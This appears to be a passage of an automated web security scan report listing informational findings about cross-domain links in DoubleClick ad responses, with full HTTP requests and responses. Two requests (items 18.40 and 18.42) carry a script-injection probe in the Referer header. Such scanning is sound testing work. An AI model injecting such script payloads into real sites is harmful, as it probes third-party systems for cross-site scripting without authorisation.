<a href="http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0NW81dDdtayhnaWQkZmI0NmM3ODgtZTE0YS0xMWUwLThlNWItNTMyMTA0ZTljMGRjLHN0JDEzMTYyNzcyOTgwNjU4NjAsc2kkMjM2OTA1MSx2JDEuMCxhaWQkOFBGMVVrUzBxdXctLGN0JDI1LHlieCR2V3BLVkVtMjcySW8zVXc5RlFvc1R3LHIkMCkp/0/*http://ad.doubleclick.net/click%3Bh%3Dv8/3b85/7/fd/%2a/p%3B245527721%3B0-0%3B0%3B70481843%3B3454-728/90%3B43996437/44014224/1%3B%3B%7Esscs%3D%3fhttp://adready.com/campaign_event/click/13409951?h=03aa6f56b6aa5e19a914" target="_blank">
<img src="http://s0.2mdn.net/2772323/1315845984811807.jpg" border="0" alt=""/>
</a>
...[SNIP]...
18.31. http://ad.doubleclick.net/adi/N763.SpecificMedia.com/B5645537.30  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N763.SpecificMedia.com/B5645537.30

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /adi/N763.SpecificMedia.com/B5645537.30;sz=728x90;pc=[TPAS_ID];click=http://clk.specificclick.net/click/v=5%3Bm=3%3Bl=24536%3Bc=176942%3Bb=1044949%3Bts=20110917123525%3Bdct=;ord=1316277325? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://afe.specificclick.net/serve/v=5;m=3;l=24536;c=176942;b=1044949;ts=20110917123525
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6091
Set-Cookie: id=c3c1d423c000085||t=1316278409|et=730|cs=002213fd4820a643dfe50be397; path=/; domain=.doubleclick.net; expires=Mon, 16 Sep 2013 16:53:29 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Fri, 16 Sep 2011 16:53:29 GMT
Date: Sat, 17 Sep 2011 16:53:29 GMT
Expires: Sat, 17 Sep 2011 16:53:29 GMT
Cache-Control: private

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Tue Aug 16 12:28:58 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
icclick.net/click/v=5%3Bm=3%3Bl=24536%3Bc=176942%3Bb=1044949%3Bts=20110917123525%3Bdct=http://www.devry.edu/index.html?vc=200837&sc_1=2ODNDCOLSMDEMDEH&WT.mc_id=FY12_OLA_DeVryBaseline_2ODNDCOLSMDEMDEH"><img src="http://s0.2mdn.net/2049738/1-Devry_CollegesOf_728.jpg" width="728" height="90" border="0" alt="" galleryimg="no"></a></noscript>

<!--
Evidon tag
Campaign: FY12 DVU Inquiry Baseline
Client ID: 279
Notice ID: 1913
Ad Size: 728x90
-->
<script type="text/javascript" src="http://c.betrad.com/surly.js?;ad_w=728;ad_h=90;coid=279;nid=1913;crid=177;"></script>
18.32. http://ad.doubleclick.net/adi/N763.SpecificMedia.com/B5645537.31  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N763.SpecificMedia.com/B5645537.31

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /adi/N763.SpecificMedia.com/B5645537.31;sz=300x250;pc=[TPAS_ID];click=http://clk.specificclick.net/click/v=5%3Bm=3%3Bl=24537%3Bc=176942%3Bb=1044948%3Bts=20110917124135%3Bdct=;ord=1316277695? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://afe.specificclick.net/serve/v=5;m=3;l=24537;c=176942;b=1044948;ts=20110917124135
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6037
Date: Sat, 17 Sep 2011 17:03:41 GMT

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Mon Jun 28 15:03:57 EDT 2010 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
icclick.net/click/v=5%3Bm=3%3Bl=24537%3Bc=176942%3Bb=1044948%3Bts=20110917124135%3Bdct=http://www.devry.edu/index.html?vc=200837&sc_1=2ODNDBOBSMDEMDEH&WT.mc_id=FY12_OLA_DeVryBaseline_2ODNDBOBSMDEMDEH"><img src="http://s0.2mdn.net/2049738/1-best_of300.jpg" width="300" height="250" border="0" alt="" galleryimg="no"></a></noscript>

<!--
Evidon tag
Campaign: FY12 DVU Inquiry Baseline
Client ID: 279
Notice ID: 1913
Ad Size: 300x250
-->
<script type="text/javascript" src="http://c.betrad.com/surly.js?;ad_w=300;ad_h=250;coid=279;nid=1913;crid=179;"></script>
18.33. http://ad.doubleclick.net/adj/N5295.SD128132N5295SN0/B5753751.3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5295.SD128132N5295SN0/B5753751.3

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adj/N5295.SD128132N5295SN0/B5753751.3;sz=728x90;click0=http://a1.interclick.com/icaid/187969/tid/32538ae1-3af4-420f-9506-361ee76e8329/click.ic?;ord=634518590430909710? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/610/hearst/728x90/ht_1064834_61686642?t=1316294711579&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.seattlepi.com%2F&refer=http%3A%2F%2Fhearst.com%2Fnewspapers%2Fseattlepicom.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 38314
Set-Cookie: id=c07e7413c0000fe||t=1316276763|et=730|cs=002213fd48bb4f54b8fdb0bbf6; path=/; domain=.doubleclick.net; expires=Mon, 16 Sep 2013 16:26:03 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Fri, 16 Sep 2011 16:26:03 GMT
Date: Sat, 17 Sep 2011 16:26:03 GMT
Expires: Sat, 17 Sep 2011 16:26:03 GMT
Cache-Control: private

document.write('');

if(typeof(dartCallbackObjects) == "undefined")
var dartCallbackObjects = new Array();
if(typeof(dartCreativeDisplayManagers) == "undefined")
var dartCreativeDisplayManagers =
...[SNIP]...
caid/187969/tid/32538ae1-3af4-420f-9506-361ee76e8329/click.ic?http://www.google.com/offers?utm_source=oa&utm_medium=oa-&site=791901&utm_campaign=en-US&utm_term=pid_68093638-cid_43091605-aid_244382735"><IMG SRC="http://s0.2mdn.net/3125202/PID_1715626_SkyBridge_NY_728x90.jpg" width="728" height="90" BORDER=0 alt="'+ altImgAltText +'"></A>
...[SNIP]...
18.34. http://ad.doubleclick.net/adj/N5295.SD128132N5295SN0/B5761718.3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5295.SD128132N5295SN0/B5761718.3

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adj/N5295.SD128132N5295SN0/B5761718.3;sz=728x90;click0=http://a1.interclick.com/icaid/190924/tid/d3ec630d-02fb-4813-b182-89e9e8bb70ec/click.ic?;ord=634518597370793803? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/610/hearst/728x90/ht_1064834_61686626?t=1316295408900&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.seattlepi.com%2Fflashtalking%2Fftlocal.html%3Fifsrc%3Dhttp%253A%252F%252Fa.flashtalking.com%252Fxre%252F18%252F189583%252F237666%252Fjs%252Fj-189583-237666.js%26click%3Dhttp%3A%2F%2Fmpc.mxptint.net%2F1S1S758D1EF6S0S9FSA2DS1S12CSFAS7CSB26_27703FDE_10878AA%253f%26ftx%3D%26fty%3D%26ftadz%3D%26ftscw%3D%26cachebuster%3D802568.8005145639%2526ftguid%253D1343AC00FD7B0F%2526ftcfid%253D237666001%2526ftoob%253D%2526ftsg%253Dadg&refer=http%3A%2F%2Ftag.admeld.com%2Fad%2Fiframe%2F610%2Fhearst%2F300x250%2Fht_1064834_61721100%3Ft%3D1316295386536%26tz%3D300%26hu%3D%26ht%3Djs%26hp%3D0%26url%3Dhttp%253A%252F%252Fwww.seattlepi.com%252F%26refer%3Dhttp%253A%252F%252Fwww.seattlepi.com%252F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 38297
Date: Sat, 17 Sep 2011 16:35:38 GMT

document.write('');

if(typeof(dartCallbackObjects) == "undefined")
var dartCallbackObjects = new Array();
if(typeof(dartCreativeDisplayManagers) == "undefined")
var dartCreativeDisplayManagers =
...[SNIP]...
caid/190924/tid/d3ec630d-02fb-4813-b182-89e9e8bb70ec/click.ic?http://www.google.com/offers?utm_source=oa&utm_medium=oa-&site=791901&utm_campaign=en-US&utm_term=pid_69978503-cid_43091605-aid_245022995"><IMG SRC="http://s0.2mdn.net/3125202/PID_1715626_SkyBridge_NY_728x90.jpg" width="728" height="90" BORDER=0 alt="'+ altImgAltText +'"></A>
...[SNIP]...
18.35. http://ad.doubleclick.net/adj/hdm.seventeen/other/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/hdm.seventeen/other/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adj/hdm.seventeen/other/;sz=336x280;tile=2;pos=4;site=seventeen;sect=index;sub=index;subsub=index;page=homepage;cat=other;subcat=;tool=ros;artid=;kw=;a=;b=;mtfIFPath=/cm/shared/admeld/;game=;ord=6638360701035708? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.seventeen.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 1905
Date: Sat, 17 Sep 2011 16:25:36 GMT

document.write('<iframe src=\"http://view.atdmt.com/UJ3/iview/295138956/direct/01/6447245?click=http://ad.doubleclick.net/click%3Bh%3Dv8/3b85/3/0/%2a/u%3B234716514%3B0-0%3B1%3B33263296%3B4252-336/280%
...[SNIP]...
3D%3Btool%3Dros%3Bartid%3D%3Bkw%3D%3Ba%3D%3Bb%3D%3BmtfIFPath%3D/cm/shared/admeld/%3Bgame%3D%3B%7Eaopt%3D2/0/34/0%3B%7Esscs%3D%3fhttp://clk.atdmt.com/UJ3/go/295138956/direct/01/6447245" target="_blank"><img src="http://view.atdmt.com/UJ3/view/295138956/direct/01/6447245"/></a>
...[SNIP]...
18.36. http://ad.doubleclick.net/adj/hdm.seventeen/other/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/hdm.seventeen/other/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adj/hdm.seventeen/other/;sz=728x90;tile=16;pos=2;site=seventeen;sect=index;sub=index;subsub=index;page=homepage;cat=other;subcat=;tool=ros;artid=;kw=;a=;b=;mtfIFPath=/cm/shared/admeld/;ord=6638360701035708? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.seventeen.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 1871
Date: Sat, 17 Sep 2011 16:25:38 GMT

document.write('<iframe src=\"http://view.atdmt.com/UJ3/iview/295138948/direct/01/6449089?click=http://ad.doubleclick.net/click%3Bh%3Dv8/3b85/3/0/%2a/v%3B234716479%3B0-0%3B1%3B33263296%3B3454-728/90%3
...[SNIP]...
%3Bsubcat%3D%3Btool%3Dros%3Bartid%3D%3Bkw%3D%3Ba%3D%3Bb%3D%3BmtfIFPath%3D/cm/shared/admeld/%3B%7Eaopt%3D2/0/34/0%3B%7Esscs%3D%3fhttp://clk.atdmt.com/UJ3/go/295138948/direct/01/6449089" target="_blank"><img src="http://view.atdmt.com/UJ3/view/295138948/direct/01/6449089"/></a>
...[SNIP]...
18.37. http://ad.doubleclick.net/adj/hdm.seventeen/other/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/hdm.seventeen/other/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adj/hdm.seventeen/other/;sz=315x40;tile=6;site=seventeen;sect=index;sub=index;subsub=index;page=homepage;cat=other;subcat=;tool=ros;kw=;a=;b=;ord=6638360701035708? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.seventeen.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 384
Date: Sat, 17 Sep 2011 16:25:34 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b85/0/0/%2a/g;44306;0-0;0;33263296;8444-315/40;0/0/0;;~okv=;sz=315x40;tile=6;site=seventeen;sect=index;sub=index;subsub=index;page=homepage;cat=other;subcat=;tool=ros;kw=;a=;b=;~aopt=2/0/34/0;~sscs=%3f"><img src="http://s0.2mdn.net/viewad/817-grey.gif" border=0 alt="Click here to find out more!"></a>
...[SNIP]...
18.38. http://ad.doubleclick.net/adj/hfmus.eg.hp/landingpage  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/hfmus.eg.hp/landingpage

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adj/hfmus.eg.hp/landingpage;aid=0;dcopt=ist;sz=728x90;tile=1;ord=7698357149492949000? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript; charset=UTF-8
Content-Length: 2818
Date: Sat, 17 Sep 2011 16:32:42 GMT

var divid='dclkAdsDivID_1061';
document.write('<div id=' + divid + '></div>');
var adsenseHtml_1061 = "<html><head></head><body leftMargin=\"0\" topMargin=\"0\" marginwidth=\"0\" marginheight=\"0\"><a
...[SNIP]...
g_afc%26url%3Dhttp://ellegirl.elle.com/%26hl%3Den%26client%3Dca-pub-4185975778453098%26adU%3Dwww1.bloomingdales.com%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNHv7jGl9vJ3AQO7tZyGj6ZlkgudSA\" target=_blank><img alt=\"AdChoices\" border=0 height=15px src=http://pagead2.googlesyndication.com/pagead/images/ad_choices_en.png width=77px/></a>
...[SNIP]...
18.39. http://ad.doubleclick.net/adj/hfmus.eg.hp/landingpage  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/hfmus.eg.hp/landingpage

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adj/hfmus.eg.hp/landingpage;aid=0;sz=122x150;ord=7698357149492949000? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 286
Date: Sat, 17 Sep 2011 16:25:01 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b85/0/0/%2a/h;44306;0-0;0;55334957;10901-122/150;0/0/0;;~okv=;aid=0;sz=122x150;~aopt=2/1/25/1;~sscs=%3f"><img src="http://s0.2mdn.net/viewad/817-grey.gif" border=0 alt="Click here to find out more!"></a>
...[SNIP]...
18.40. http://ad.doubleclick.net/adj/hfmus.eg.hp/landingpage  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/hfmus.eg.hp/landingpage

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adj/hfmus.eg.hp/landingpage;aid=0;sz=160x600,300x250,300x600;loc=1;tile=2;ord=7678706703702019000? HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/?b1903%3C/script%3E%3Cscript%3Ealert(document.location)%3C/script%3E43727dda065=1
Cookie: id=229a9504260100ca||t=1312233693|et=730|cs=002213fd4876a8a011eba88ea7

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 38438
Date: Sat, 17 Sep 2011 16:34:58 GMT

document.write('');

if(typeof(dartCallbackObjects) == "undefined")
var dartCallbackObjects = new Array();
if(typeof(dartCreativeDisplayManagers) == "undefined")
var dartCreativeDisplayManagers =
...[SNIP]...
57%3B0-0%3B0%3B55334957%3B4307-300/250%3B43565157/43582944/1%3B%3B%7Eokv%3D%3Baid%3D0%3Bsz%3D160x600%2C300x250%2C300x600%3Bloc%3D1%3Btile%3D2%3B%7Eaopt%3D2/1/25/1%3B%7Esscs%3D%3fhttp://www.google.com"><IMG SRC="http://s0.2mdn.net/2984639/PID_1707766_ES_Color-Explosion_300x250_backup.jpg" width="300" height="250" BORDER=0 alt="'+ altImgAltText +'"></A>
...[SNIP]...
18.41. http://ad.doubleclick.net/adj/hfmus.eg.hp/landingpage  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/hfmus.eg.hp/landingpage

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adj/hfmus.eg.hp/landingpage;aid=0;sz=160x600,300x250,300x600;loc=1;tile=2;ord=7698357149492949000? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 38318
Date: Sat, 17 Sep 2011 16:25:03 GMT

document.write('');

if(typeof(dartCallbackObjects) == "undefined")
var dartCallbackObjects = new Array();
if(typeof(dartCreativeDisplayManagers) == "undefined")
var dartCreativeDisplayManagers =
...[SNIP]...
57%3B0-0%3B0%3B55334957%3B4307-300/250%3B43565157/43582944/1%3B%3B%7Eokv%3D%3Baid%3D0%3Bsz%3D160x600%2C300x250%2C300x600%3Bloc%3D1%3Btile%3D2%3B%7Eaopt%3D2/1/25/1%3B%7Esscs%3D%3fhttp://www.google.com"><IMG SRC="http://s0.2mdn.net/2984639/PID_1716297_082211_300x250_Maybelline_VexFalsiesFlared.jpg" width="300" height="250" BORDER=0 alt="'+ altImgAltText +'"></A>
...[SNIP]...
18.42. http://ad.doubleclick.net/adj/hfmus.eg.hp/landingpage  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/hfmus.eg.hp/landingpage

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adj/hfmus.eg.hp/landingpage;aid=0;dcopt=ist;sz=728x90;tile=1;ord=9536684970371424000? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/?b1903%3C/script%3E%3Cscript%3Ealert(document.location)%3C/script%3E43727dda065=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 38354
Date: Sat, 17 Sep 2011 16:34:36 GMT

document.write('');

if(typeof(dartCallbackObjects) == "undefined")
var dartCallbackObjects = new Array();
if(typeof(dartCreativeDisplayManagers) == "undefined")
var dartCreativeDisplayManagers =
...[SNIP]...
3B%7Efdr%3D243561356%3B0-0%3B0%3B55334957%3B3454-728/90%3B43569524/43587311/1%3B%3B%7Eokv%3D%3Baid%3D0%3Bdcopt%3Dist%3Bsz%3D728x90%3Btile%3D1%3B%7Eaopt%3D2/1/25/1%3B%7Esscs%3D%3fhttp://www.google.com"><IMG SRC="http://s0.2mdn.net/2984639/PID_1733257_Maybelline_Fashion_Week_728x90.jpg" width="729" height="90" BORDER=0 alt="'+ altImgAltText +'"></A>
...[SNIP]...
18.43. http://ad.doubleclick.net/adj/locm.hp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/locm.hp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adj/locm.hp;dcopt=ist;kw=;pos=;tile=;city=dallas_tx_75201;sz=163x27;kw=org;ord=1316294750105? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.local.com/dart/?ag=True&css=sponsored-by&p=locm.hp&sz=163x27&ord=1316294750105&l=Dallas%2c+TX&zip=75201&kw=org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 245
Set-Cookie: id=c1def413c00005f||t=1316276935|et=730|cs=002213fd48840c95f4164782de; path=/; domain=.doubleclick.net; expires=Mon, 16 Sep 2013 16:28:55 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Fri, 16 Sep 2011 16:28:55 GMT
Date: Sat, 17 Sep 2011 16:28:55 GMT
Expires: Sat, 17 Sep 2011 16:28:55 GMT
Cache-Control: private

document.write('<a target="_top" href="http://ad.doubleclick.net/click;h=v8/3b85/0/0/%2a/h;44306;0-0;0;49214119;40236-163/27;0/0/0;;~sscs=%3f"><img src="http://s0.2mdn.net/viewad/817-grey.gif" border=0 alt="Click here to find out more!"></a>
...[SNIP]...
18.44. http://ad.doubleclick.net/adj/q1.q.seattlepostintelligencer/home  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/q1.q.seattlepostintelligencer/home

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adj/q1.q.seattlepostintelligencer/home;net=q1;u=,q1-30412253378_1316276978,,polit,;;cmw=owl;sz=728x90;net=q1;ord1=105623;contx=polit;dc=s;btg=;ord=3639010052? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 38700
Date: Sat, 17 Sep 2011 16:49:31 GMT

document.write('');

if(typeof(dartCallbackObjects) == "undefined")
var dartCallbackObjects = new Array();
if(typeof(dartCreativeDisplayManagers) == "undefined")
var dartCreativeDisplayManagers =
...[SNIP]...
1316276978%2C%2Cpolit%2C%3B%7Eaopt%3D3/1/34/0%3B%7Esscs%3D%3fhttp://www.google.com/offers?utm_source=oa&utm_medium=oa-&site=1073915&utm_campaign=en-US&utm_term=pid_68090788-cid_43091605-aid_244382735"><IMG SRC="http://s0.2mdn.net/3125202/PID_1715626_SkyBridge_NY_728x90.jpg" width="728" height="90" BORDER=0 alt="'+ altImgAltText +'"></A>
...[SNIP]...
18.45. http://ad.doubleclick.net/adj/realage.index/index/other/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/realage.index/index/other/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adj/realage.index/index/other/;c=;d=;e=;g=0;h=;i=;u=;f=;kw=;site=realage;position=ams_realage_home_rra;a=;full=;sect=index;sub=index;page=homepage;hi=;search=;cat=other;subcat=;!c=classic;sz=300x250;tile=3;ord=1031343233771622.1? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.realage.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 434
Date: Sat, 17 Sep 2011 16:32:25 GMT

document.write('<a target="_new" href="http://ad.doubleclick.net/click;h=v8/3b85/0/0/%2a/v;240272397;0-0;11;62916199;4307-300/250;43287975/43305762/1;u=;~aopt=2/0/ff/0;~sscs=%3fhttp://www.realage.com/soothe-stress/mind-and-mood/diagnosing-adhd?src=house&dom=realage&ad=adhd-ohg-300x250-crv01&cbr=strgr1_hg"><img src="http://s0.2mdn.net/viewad/2021291/adhd-center-300x250-crv01.jpg" border=0 alt="Click here to find out more!"></a>
